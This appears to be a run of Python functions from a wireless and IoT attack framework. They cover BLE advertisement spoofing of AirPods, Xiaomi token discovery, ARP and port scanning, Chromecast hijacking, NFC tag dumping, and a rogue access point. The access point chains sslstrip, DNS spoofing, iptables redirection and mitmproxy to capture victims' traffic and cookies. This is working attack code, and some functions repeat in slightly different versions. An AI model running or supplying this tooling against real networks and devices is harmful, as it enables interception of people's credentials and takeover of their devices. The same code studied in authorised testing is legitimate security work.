def run(self): """Get values for the accesories of the airpod and genrates an le advertising with them """ random = str(self.args.get("random", "False")).lower() == "true" interval = int(self.args.get("interval", 10)) dev_id = int(self.args.get("ble_iface", 0)) if random: left_speaker, right_speaker, case = self.random_values() else: left_speaker = (int(self.args.get("left_speaker", 0)), ) right_speaker = (int(self.args.get("right_speaker", 0)), ) case = (int(self.args.get("case", 0)), ) toggle_device(dev_id, True) data1 = (0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x01, 0x02, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45) data2 = (0xda, 0x29, 0x58, 0xab, 0x8d, 0x29, 0x40, 0x3d, 0x5c, 0x1b, 0x93, 0x3a) try: sock = bluez.hci_open_dev(dev_id) except: print_error("Cannot open bluetooth device %i" % dev_id) return try: print_info("Start advertising press ctrl + c to quit...") start_le_advertising(sock, adv_type=0x03, min_interval=interval, max_interval=interval, data=(data1 + left_speaker + right_speaker + case + data2)) while True: sleep(2) except: stop_le_advertising(sock) print() print_error("Bye")
def run(self): # thanks to python-miio https://github.com/rytilahti/python-miio try: timeout = int(self.args["timeout"]) except: timeout = 5 addrs = [] # To avoid duplicates if str(self.args["rhost"]) != "None": addr = self.args["rhost"] else: addr = '255.255.255.255' print("Sending packets...") helobytes = bytes.fromhex('21310020ffffffffffffffffffffffffffffffffffffffffffffffffffffffff') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) s.settimeout(timeout) s.sendto(helobytes, (addr, 54321)) while True: try: data, addr = s.recvfrom(1024) token = "" try: #TODO token = str(data[16:]).replace("b'","").replace("'","").replace("\\x","") except: token = "" if addr[0] not in addrs: print_info(f"Xiaomi Device >> {addr[0]} - Token({token})") addrs.append(addr[0]) except socket.timeout: print_ok("Discovery done") break except Exception as ex: print_error(f"Error while reading discover results: {ex}") break
def _subscribe(self): #print_info(f"Trying to subscribe to {self.args['bmac']}") bmac = self.args["bmac"] data = self._transform_data(self.args["encode"], self.args["data"]) subs = False conn = 0 try: iface = int(self.args["iface"]) except: iface = 0 print_info(f"\nTrying to subscribe to {bmac}") ble_device = BLE(self.args["bmac"], self.args["type"], iface) while True: wait = False try: ble_device.connect() print_ok("\nDevice connected...") ble_device.set_subscribe(self.args["uuid"]) subs = True wait = True ble_device.set_delegate(HomeSecurityDelegate) except KeyboardInterrupt: print("Module Interrupted") break except: sleep(3) conn += 1 if conn == 5: break continue if wait: ble_device.subscribe() print("") if subs: print_error(f"Unsubscribed {self.args['bmac']}") else: print_error(f"Unable to subscribe to {self.args['bmac']}")
def run(self): try: if self.args["timeout"]: self.args["timeout"] = int(self.args["timeout"]) else: self.args["timeout"] = 2 except: self.args["timeout"] = 2 if str(self.args["verbose"]).lower() == "true": self.args["verbose"] = True else: self.args["verbose"] = False print("Scanning...") results = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=self.args["rhost"]),timeout=self.args["timeout"], \ iface=self.args["iface"],inter=0.1, verbose=self.args["verbose"])[0] msg = "Hosts alive" print(msg) print(len(msg) * "-") for result in results: print_info(f'MAC: {result[1].hwsrc} - IP: {result[1].psrc}')
def run(self): print_info("Searching devices") chromecasts = pychromecast.get_chromecasts(timeout=self.args["timeout"]) if chromecasts: for cast in [cc for cc in chromecasts]: print_info(f"{cast.device.friendly_name} ({cast.device.cast_type} - {cast.device.manufacturer}) => {cast.host}") else: print_info("No devices found")
def output(self, err, monchannel): os.system('clear') if err: print_error(err) else: print_ok(f'{self.mon_iface} channel: {monchannel}\n') if len(self.clients_APs) > 0 and self.show_stations: print( ' ch Client BSSID (ESSID)') # Print the clients list with self.lock: for ca in self.clients_APs: print_info( f"[*] {ca['channel'].ljust(2)} - {ca['client']} ({ca['vendor']}) - {ca['bssid_ap']} ({ca['essid_ap']})" ) if len(self.APs) > 0 and self.show_aps: print('\n Access Points Enc ch ESSID') with self.lock: for ap in self.APs: print( f'[*] {ap["bssid"]} - {ap["encrypted"]} - {ap["ap_channel"].ljust(2)} - {ap["ssid"]}' ) print('')
def run(self): if not self.args["rhost"] and not self.args["name"]: print_info( "Show options, it's necessary to configure onename or rhost") return if str(self.args["timeout"]) == "None": self.args["timeout"] = 6 try: chromecasts = pychromecast.get_chromecasts( timeout=self.args["timeout"]) cast = next(cc for cc in chromecasts if (cc.device.friendly_name == self.args["name"] or cc.host == self.args["rhost"])) cast.wait() print_info("Device found, sending video") except: print_error("Device no found") return yt = YouTubeController() cast.register_handler(yt) yt.play_video(self.args["video"]) print_ok("Done!")
def kill_task(self, index): try: i = int(index) th = self.tasks.get(i, None) if th: thread = th["thread"] pid = th["pid"] name = thread.name try: if pid: kill(pid, signal.SIGINT) # some task needs some time to stop sleep(th["wait"]) thread.terminate() thread.join() except: pass del self.tasks[i] print_info(f"Task {index} - {name} has been killed") else: print_info("Task not found") except Exception as e: print(e) print_error("It has not been possible to kill the task")
def run(self): try: if self.args["timeout"]: self.args["timeout"] = int(self.args["timeout"]) else: self.args["timeout"] = 2 except: self.args["timeout"] = 2 if self.args["rport"]: self._scan(int(self.args["rport"])) elif self.args["rports"]: try: first, last = self.args["rports"].split("-") ports_list = [] for port in range(int(first), int(last) + 1): ports_list.append(port) pool = Pool(4) pool.map(self._scan, ports_list) pool.close() pool.join() except: print_error("Bad format in rposts") else: print_info("rport or rports must be configured")
def start_some_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if): if wireshark_if: print_info("Starting WIRESHARK...") os.system("sudo screen -S mitmap-wireshark -m -d wireshark -i " + ap_iface + " -k -w " + script_path + "logs/mitmap-wireshark.pcap") if driftnet_if: print_info("Starting DRIFTNET...") os.system("sudo screen -S mitmap-driftnet -m -d driftnet -i " + ap_iface) if tshark_if: print_info("Starting TSHARK...") os.system("sudo screen -S mitmap-tshark -m -d tshark -i " + ap_iface + " -w " + script_path + "logs/mitmap-tshark.pcap")
def run(self): ascii_text = self.args["ascii"] try: binary_text = self.text_to_bits(ascii_text) hext_text = ascii_text.encode("utf-8").hex() print_info(f"Input -> {ascii_text}") print_info(f"|_ Hex: {hext_text}") print_info(f"|_ Bin: {binary_text}") except: print_error("Error processing input")
def run(self): binary_text = self.args["binary"] try: ascii_text = self.text_from_bits(binary_text) hext_text = ascii_text.encode("utf-8").hex() print_info(f"Input -> {binary_text}") print_info(f"|_ Hex: {hext_text}") print_info(f"|_ Ascii: {ascii_text}") except Exception as e: print(e) print_error("Error processing input")
def run(self): hex_text = self.args["hex"] try: ascii_text = binascii.unhexlify(hex_text).decode() binary_text = self.text_to_bits(ascii_text) hext_text = ascii_text.encode("utf-8").hex() print_info(f"Input -> {hext_text}") print_info(f"|_ Ascii: {ascii_text}") print_info(f"|_ Bin: {binary_text}") except: print_error("Error processing input")
def run(self): print_info("Searching services...") bmac = self.args["bmac"] # User input is String (just in case) if str(bmac) == "None": print_info("This process can take time, patience") bmac = None services = find_service(address=bmac) if len(services) > 0: print_ok(f"Found {len(services)} services") print("") self._show_services(services) else: print_info("No services found")
def run(self): print("Searching devices...") duration = int(self.args["timeout"]) devices = discover_devices(duration=duration, lookup_names=True, flush_cache=True, lookup_class=True) msg = f"found {len(devices)} devices" print_info(msg) print("-" * len(msg)) for addr, name, cl in devices: try: print_info(f"{addr} - {name} ({hex(cl)})") except UnicodeEncodeError: print_info( f"{addr} - {name.encode('utf-8', 'replace')} ({hex(cl)})")
def start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if): if wireshark_if: print_info("Starting WIRESHARK...") subprocess.call( f"sudo screen -S mitmap-wireshark -m -d wireshark -i {ap_iface} -k -w {script_path} logs/mitmap-wireshark.pcap", shell=True) if driftnet_if: print_info("Starting DRIFTNET...") subprocess.call( f"sudo screen -S mitmap-driftnet -m -d driftnet -i {ap_iface}", shell=True) if tshark_if: print_info("Starting TSHARK...") subprocess.call( f"sudo screen -S mitmap-tshark -m -d tshark -i {ap_iface} -w {script_path} logs/mitmap-tshark.pcap", shell=True)
def show_tag(self, tag, verbose): print(tag) if (tag.ndef): print_info("NDEF Capabilities:") print_body(f" readable = {self.get_color(tag.ndef.is_readable)}") print_body( f" writeable = {self.get_color(tag.ndef.is_writeable)}") print(f" capacity = {tag.ndef.capacity} byte") print(f" message = {tag.ndef.length} byte") if tag.ndef.length > 0: print_info("NDEF Message:") for i, record in enumerate(tag.ndef.records): print_ok(f"record {i + 1}") print(" type =", repr(record.type)) print(" name =", repr(record.name)) print(" data =", repr(record.data)) if (verbose): print_info("Memory Dump:") print(' ' + '\n '.join(tag.dump()))
def run(self): print_info("Use CTRL^C to end this task") sn = Sniffing(iface=self.args["iface"], channel=self.args["channel"], show_stations=False) sn.start_sniffing()
def disconnect(self): if self.device: self.device.disconnect() self.device = None print_info("\nDisconnected")
def handleNotification(self, cHandle, data): print_info(f"A Notification was received from {cHandle}: ") print_info(f"|_ Hex: {binascii.b2a_hex(data)}") print_info(f"|_ Ascii: {data.decode('utf-8')}")
def start_dns_masq(): print_info("Starting DNSMASQ server...") subprocess.call("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1", shell=True) subprocess.call("sudo pkill dnsmasq", shell=True) subprocess.call("sudo dnsmasq", shell=True)
def stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path): try: print_info("Stopping AP") if sslstrip_if: os.system("sudo screen -S mitmap-hostapd -X stuff '^C\n'") os.system("sudo screen -S mitmap-sslstrip -X stuff '^C\n'") os.system("sudo screen -S mitmap-dns2proxy -X stuff '^C\n'") if dns_if: print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo mv " + script_path + "src/dns2proxy/spoof.cfg.backup " + script_path + "src/dns2proxy/spoof.cfg") if wireshark_if: os.system("sudo screen -S mitmap-wireshark -X stuff '^C\n'") if driftnet_if: os.system("sudo screen -S mitmap-driftnet -X stuff '^C\n'") if tshark_if: os.system("sudo screen -S mitmap-tshark -X stuff '^C\n'") print_info("Restoring old NetworkManager.cfg") if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"): os.system( "sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf" ) else: os.system("sudo rm /etc/NetworkManager/NetworkManager.conf") print_info("Restarting NetworkManager...") os.system("sudo service network-manager restart") print_info("Stopping DNSMASQ server...") os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1") os.system("sudo pkill dnsmasq") print_info("Restoring old dnsmasq.cfg...") os.system( "sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1" ) print_info("Deleting old '/etc/dnsmasq.hosts' file...") os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1") print_info("Flushing iptables rules...") os.system("sudo iptables --flush") os.system("sudo iptables --flush -t nat") os.system("sudo iptables --delete-chain") os.system("sudo iptables --table nat --delete-chain") #print_info("Traffic have been saved to the 'log' folder!") print_ok("mitmAP stopped.") except KeyboardInterrupt: print_info("\n\n[!] Stopping... (Dont worry if you get errors)") try: if sslstrip_if: os.system("sudo screen -S mitmap-hostapd -X stuff '^C\n'") os.system("sudo screen -S mitmap-sslstrip -X stuff '^C\n'") os.system("sudo screen -S mitmap-dns2proxy -X stuff '^C\n'") if dns_if: print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo mv " + script_path + "src/dns2proxy/spoof.cfg.backup " + script_path + "src/dns2proxy/spoof.cfg") except: pass try: if wireshark_if: os.system("sudo screen -S mitmap-wireshark -X stuff '^C\n'") except: pass try: if driftnet_if: os.system("sudo screen -S mitmap-driftnet -X stuff '^C\n'") except: pass try: if tshark_if: os.system("sudo screen -S mitmap-tshark -X stuff '^C\n'") except: pass print_info("Restoring old NetworkManager.cfg") if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"): os.system( "sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1" ) else: os.system( "sudo rm /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1" ) print_info("Restarting NetworkManager...") os.system("sudo service network-manager restart") print_info("Stopping DNSMASQ server...") os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1") os.system("sudo pkill dnsmasq") print_info("Restoring old dnsmasq.cfg...") os.system( "sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1" ) print_info("Deleting old '/etc/dnsmasq.hosts' file...") os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1") print_info("Flushing iptables rules...") os.system("sudo iptables --flush") os.system("sudo iptables --flush -t nat") os.system("sudo iptables --delete-chain") os.system("sudo iptables --table nat --delete-chain") print("Module stopped.")
def launch_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, wpa_passphrase, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, all_dns, proxy_if): sslstrip_if = str(sslstrip_if).lower() == "true" driftnet_if = str(driftnet_if).lower() == "true" wireshark_if = str(wireshark_if).lower() == "true" tshark_if = str(tshark_if).lower() == "true" dns_if = str(dns_if).lower() == "true" hostapd_wpa = str(hostapd_wpa).lower() == "true" try: script_path = os.path.dirname(os.path.realpath(__file__)) + "/../" os.system("sudo chmod 777 " + script_path + "logs") network_manager_cfg = "[main]\nplugins=keyfile\n\n[keyfile]\nunmanaged-devices=interface-name:" + ap_iface + "\n" print("Backing up NetworkManager.cfg...") os.system("sudo cp /etc/NetworkManager/NetworkManager.conf /etc/NetworkManager/NetworkManager.conf.backup") print("Editing NetworkManager.cfg...") write_file("/etc/NetworkManager/NetworkManager.conf", network_manager_cfg ) print("Restarting NetworkManager...") os.system("sudo service network-manager restart") os.system("sudo ifconfig " + ap_iface + " up") #DNSMASQ CONFIG print_info("Backing up /etc/dnsmasq.conf...") os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup") print_info("Creating new /etc/dnsmasq.conf...") if sslstrip_if: dnsmasq_file = "port=0\n# disables dnsmasq reading any other files like /etc/resolv.conf for nameservers\nno-resolv\n# Interface to bind to\ninterface=" + ap_iface + "\n#Specify starting_range,end_range,lease_time\ndhcp-range=10.0.0.3,10.0.0.20,12h\ndhcp-option=3,10.0.0.1\ndhcp-option=6,10.0.0.1\n" else: dnsmasq_file = "# disables dnsmasq reading any other files like /etc/resolv.conf for nameservers\nno-resolv\n# Interface to bind to\ninterface=" + ap_iface + "\n#Specify starting_range,end_range,lease_time\ndhcp-range=10.0.0.3,10.0.0.20,12h\n# dns addresses to send to the clients\nserver=8.8.8.8\nserver=10.0.0.1\n" print_info("Deleting old config file...") os.system("sudo rm /etc/dnsmasq.conf > /dev/null 2>&1") print_info("Writing config file...") write_file("/etc/dnsmasq.conf", dnsmasq_file) #/DNSMASQ CONFIG #HOSTAPD CONFIG if hostapd_wpa: hostapd_file = "interface=" + ap_iface + "\ndriver=nl80211\nssid=" + ssid + "\nhw_mode=g\nchannel=" + channel + "\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\nwpa=2\nwpa_passphrase=" + wpa_passphrase + "\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=TKIP\nrsn_pairwise=CCMP\n" else: hostapd_file = "interface=" + ap_iface + "\ndriver=nl80211\nssid=" + ssid + "\nhw_mode=g\nchannel=" + channel + "\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\n" print_info("Deleting old config file...") os.system("sudo rm /etc/hostapd/hostapd.conf > /dev/null 2>&1") print_info("Writing config file...") write_file("/etc/hostapd/hostapd.conf", hostapd_file) #/HOSTAPD CONFIG #IPTABLES print_info("Configuring AP interface...") os.system("sudo ifconfig " + ap_iface + " up 10.0.0.1 netmask 255.255.255.0") print_info("Applying iptables rules...") os.system("sudo iptables --flush") os.system("sudo iptables --table nat --flush") os.system("sudo iptables --delete-chain") os.system("sudo iptables --table nat --delete-chain") os.system("sudo iptables --table nat --append POSTROUTING --out-interface " + net_iface + " -j MASQUERADE") os.system("sudo iptables --append FORWARD --in-interface " + ap_iface + " -j ACCEPT") #/IPTABLES #SSLSTRIP MODE if sslstrip_if: #SSLSTRIP DNS SPOOFING if dns_if: print_info("Backing up " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo cp " + script_path + "src/dns2proxy/spoof.cfg " + script_path + "src/dns2proxy/spoof.cfg.backup") os.system("sudo cat /dev/null > "+ script_path + "src/dns2proxy/spoof.cfg") i = 0 for ssl_dns_line in all_dns["ssl"]: os.system("sudo echo -e '" + ssl_dns_line + "' >> "+ script_path + "src/dns2proxy/spoof.cfg") #/SSLSTRIP DNS SPOOFING start_dns_masq() os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000") os.system("sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 53") os.system("sudo iptables -t nat -A PREROUTING -p tcp --dport 53 -j REDIRECT --to-port 53") os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print_info("Starting AP on " + ap_iface + " in screen terminal...") os.system("sudo screen -S mitmap-sslstrip -m -d python " + script_path + "src/sslstrip2/sslstrip.py -l 9000 -w " + script_path + "logs/mitmap-sslstrip.log -a") os.system("sudo screen -S mitmap-dns2proxy -m -d sh -c 'cd " + script_path + "src/dns2proxy && python dns2proxy.py'") time.sleep(5) os.system("sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf") start_some_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if) #print("\nTAIL started on " + script_path + "logs/mitmap-sslstrip.log...\nWait for output... (press 'CTRL + C' 2 times to stop)\nHOST-s, POST requests and COOKIES will be shown.\n") try: time.sleep(5) except: print("") #print_info("Restarting tail in 1 sec... (press 'CTRL + C' again to stop)") print_ok("Done") while True: try: time.sleep(1) #os.system("sudo tail -f " + script_path + "logs/mitmap-sslstrip.log | grep -e 'Sending Request: POST' -e 'New host:' -e 'Sending header: cookie' -e 'POST Data'") except KeyboardInterrupt: raise KeyboardInterrupt #STARTING POINT #/SSLSTRIP MODE else: #DNSMASQ DNS SPOOFING if dns_if: print_info("Backing up /etc/dnsmasq.conf...") os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup") for no_ssl_dns_line in all_dns["no_ssl"]: os.system("sudo echo -e '" + ssl_dns_line + "' >> "+ script_path + "src/dns2proxy/spoof.cfg") append_file("/etc/dnsmasq.conf", no_ssl_dns_line) else: print_info("Skipping..") #/DNSMASQ DNS SPOOFING start_dns_masq() # #MITMPROXY MODE proxy_if = proxy_if.lower() if proxy_if != "no": if proxy_if == "nossl": os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080") else: print("To install the certificate, go to 'http://mitm.it/' through the proxy, and choose your OS.") os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080") os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080") os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print("Starting AP on " + ap_iface + " in screen terminal...") if wireshark_if == "y" or wireshark_if == "": print("Starting WIRESHARK...") os.system("sudo screen -S mitmap-wireshark -m -d wireshark -i " + ap_iface + " -k -w " + script_path + "logs/mitmap-wireshark.pcap") if driftnet_if == "y" or driftnet_if == "": print("Starting DRIFTNET...") os.system("sudo screen -S mitmap-driftnet -m -d driftnet -i " + ap_iface) if tshark_if == "y" or tshark_if == "": print("Starting TSHARK...") os.system("sudo screen -S mitmap-tshark -m -d tshark -i " + ap_iface + " -w " + script_path + "logs/mitmap-tshark.pcap") os.system("sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf") print("\nStarting MITMPROXY in 5 seconds... (press q and y to exit)\n") try: time.sleep(5) except: print("") os.system("sudo mitmproxy -T --host --follow -w " + script_path + "logs/mitmap-proxy.mitmproxy") #STARTING POINT else: print("Skipping proxy...") # #/MITMPROXY MODE start_some_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if) os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print_info("Starting AP on " + ap_iface + "...\n") os.system("sudo hostapd /etc/hostapd/hostapd.conf") print_ok("Done") #STARTING POINT except KeyboardInterrupt: pass except Exception as e: print_error(e) finally: stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path)
def handleNotification(self, cHandle, data): print_info(f"A Notification was received from {cHandle}: {binascii.b2a_hex(data)}")
def add_service(self, zeroconf, type, name): info = zeroconf.get_service_info(type, name) addr = ipaddress.ip_address(info.address) print_info(f"{addr} {info.name} {info.server}")
def start_listetninig(self): print_info("[*] Looking for AirDrop senders...") AirDropCli(["receive"])
def _exit(self, param=None): print_info("Killing tasks... ") Task().get_instance().kill_all_tasks() print_info("Bye...") _exit(0)
def _print_char(self, ch): print_info(f"<b>{ch.uuid.getCommonName()}</b>") print_info(f"|_ uuid: {ch.uuid}") handle = ch.handle print_info(f"|_ handle: {hex(handle)} ({handle})") if (ch.supportsRead()): try: data = ch.read() data_decode = data.decode(errors="ignore") if data_decode: data = f"{data_decode}" print_info(f"|_ value: {data}") except: try: print_info(f"|_ value: {data}") except: print_info("|_ value: <ansired>Couldn't read</ansired>") print_info(f"|_ properties: {ch.propertiesToString()}")
def launch_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, wpa_passphrase, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, all_dns, proxy_if): sslstrip_if = str(sslstrip_if).lower() == "true" driftnet_if = str(driftnet_if).lower() == "true" wireshark_if = str(wireshark_if).lower() == "true" tshark_if = str(tshark_if).lower() == "true" dns_if = str(dns_if).lower() == "true" hostapd_wpa = str(hostapd_wpa).lower() == "true" try: # Network manager config script_path = network_manager_config(ap_iface) #DNSMASQ CONFIG dnsmasq_config(ap_iface, sslstrip_if) #HOSTAPD CONFIG hotspad_config(ap_iface, ssid, channel, wpa_passphrase, hostapd_wpa) #IPTABLES ip_tables_config(ap_iface, net_iface) #SSLSTRIP MODE if sslstrip_if: #SSLSTRIP DNS SPOOFING if dns_if: print_info("Backing up " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo cp " + script_path + "src/dns2proxy/spoof.cfg " + script_path + "src/dns2proxy/spoof.cfg.backup") os.system("sudo cat /dev/null > " + script_path + "src/dns2proxy/spoof.cfg") i = 0 for ssl_dns_line in all_dns["ssl"]: os.system("sudo echo -e '" + ssl_dns_line + "' >> " + script_path + "src/dns2proxy/spoof.cfg") #/SSLSTRIP DNS SPOOFING start_dns_masq() os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000" ) os.system( "sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 53" ) os.system( "sudo iptables -t nat -A PREROUTING -p tcp --dport 53 -j REDIRECT --to-port 53" ) os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print_info("Starting AP on " + ap_iface + " in screen terminal...") os.system("sudo screen -S mitmap-sslstrip -m -d python " + script_path + "src/sslstrip2/sslstrip.py -l 9000 -w " + script_path + "logs/mitmap-sslstrip.log -a") os.system("sudo screen -S mitmap-dns2proxy -m -d sh -c 'cd " + script_path + "src/dns2proxy && python dns2proxy.py'") time.sleep(5) os.system( "sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf" ) start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if) # print_info("configuring ñapa...") # sniff = Sniffing() # sniff.start_mon_mode(ap_iface) # sleep(1) #print("\nTAIL started on " + script_path + "logs/mitmap-sslstrip.log...\nWait for output... (press 'CTRL + C' 2 times to stop)\nHOST-s, POST requests and COOKIES will be shown.\n") try: time.sleep(5) except: print("") #print_info("Restarting tail in 1 sec... (press 'CTRL + C' again to stop)") print_ok("Done") while True: try: time.sleep(1) #os.system("sudo tail -f " + script_path + "logs/mitmap-sslstrip.log | grep -e 'Sending Request: POST' -e 'New host:' -e 'Sending header: cookie' -e 'POST Data'") except KeyboardInterrupt: raise KeyboardInterrupt #STARTING POINT #/SSLSTRIP MODE else: #DNSMASQ DNS SPOOFING if dns_if: print_info("Backing up /etc/dnsmasq.conf...") os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup") for no_ssl_dns_line in all_dns["no_ssl"]: os.system("sudo echo -e '" + ssl_dns_line + "' >> " + script_path + "src/dns2proxy/spoof.cfg") append_file("/etc/dnsmasq.conf", no_ssl_dns_line) else: print_info("Skipping..") #/DNSMASQ DNS SPOOFING start_dns_masq() # #MITMPROXY MODE proxy_if = proxy_if.lower() if proxy_if != "no": if proxy_if == "nossl": os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080" ) else: print( "To install the certificate, go to 'http://mitm.it/' through the proxy, and choose your OS." ) os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080" ) os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080" ) os.system( "sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print("Starting AP on " + ap_iface + " in screen terminal...") if wireshark_if == "y" or wireshark_if == "": print("Starting WIRESHARK...") os.system( "sudo screen -S mitmap-wireshark -m -d wireshark -i " + ap_iface + " -k -w " + script_path + "logs/mitmap-wireshark.pcap") if driftnet_if == "y" or driftnet_if == "": print("Starting DRIFTNET...") os.system( "sudo screen -S mitmap-driftnet -m -d driftnet -i " + ap_iface) if tshark_if == "y" or tshark_if == "": print("Starting TSHARK...") os.system("sudo screen -S mitmap-tshark -m -d tshark -i " + ap_iface + " -w " + script_path + "logs/mitmap-tshark.pcap") os.system( "sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf" ) print( "\nStarting MITMPROXY in 5 seconds... (press q and y to exit)\n" ) try: time.sleep(5) except: print("") os.system("sudo mitmproxy -T --host --follow -w " + script_path + "logs/mitmap-proxy.mitmproxy") #STARTING POINT else: print("Skipping proxy...") # #/MITMPROXY MODE start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if) os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print_info("Starting AP on " + ap_iface + "...\n") os.system("sudo hostapd /etc/hostapd/hostapd.conf") print_ok("Done") #STARTING POINT except KeyboardInterrupt: pass except Exception as e: print_error(e) finally: stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path)
def start_dns_masq(): print_info("Starting DNSMASQ server...") os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1") os.system("sudo pkill dnsmasq") os.system("sudo dnsmasq")